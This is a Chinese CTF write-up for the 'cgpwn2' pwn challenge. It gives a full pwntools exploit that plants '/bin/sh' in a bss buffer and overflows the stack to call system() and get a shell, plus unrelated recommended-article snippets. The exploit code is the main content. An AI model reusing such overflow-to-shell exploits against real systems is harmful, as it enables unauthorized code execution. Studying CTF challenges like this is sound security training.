10_cgpwn2

1.检查安全防护机制 32位
图片.png
2.关键字查找

图片.png
注:猜测我们需要往里面写入/bin/sh
注:我们有fgets(name, 50, stdin);我们的stdin可以写入bss段里面。

EXP
from pwn import*

elf = ELF('./cgpwn2')
context.log_level = 'debug'

p = process('./cgpwn2')
#p = remote("111.198.29.45"," 31241")
system_addr = 0x8048420
bss_addr = 0x804A080   //注意这的bss段是我们申请的name[]

p.recvuntil('name\n')
p.sendline("/bin/sh\x00")

p.recvuntil('here:\n')


payload = 'A'*42
payload += p32(system_addr)
payload += p32(0)  //有点模糊为什么写入0
payload += p32(bss_addr)

p.sendline(payload)
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 2018-06-25
    专业考题类型管理运行工作负责人一般作业考题内容选项A选项B选项C选项D选项E选项F正确答案 变电单选GYSZ本规程...
    小白兔去钓鱼阅读 9,059评论 0 13
  • 2018-07-18
    选择题部分 1.()部门负责日常监督检查工作,安全巡视的同时进行消防检查,推动消防安全制度的贯彻落实。 A: 消防...
    skystarwuwei阅读 15,623评论 0 3
  • oracle错误集合
    ORA-00001: 违反唯一约束条件 (.) 错误说明:当在唯一索引所对应的列上键入重复值时,会触发此异常。 O...
    我想起个好名字阅读 5,452评论 0 9
  • 面试题
    Swift1> Swift和OC的区别1.1> Swift没有地址/指针的概念1.2> 泛型1.3> 类型严谨 对...
    cosWriter阅读 11,148评论 1 32
  • 《祝你有口好牙》
    奶奶说她见的下一位朋友叫死神 我问她 是约定吗 可你已经老的无法下床 那位朋友来找我,宝贝 他知道我这时已经啃不动...
    假帽先生阅读 170评论 0 2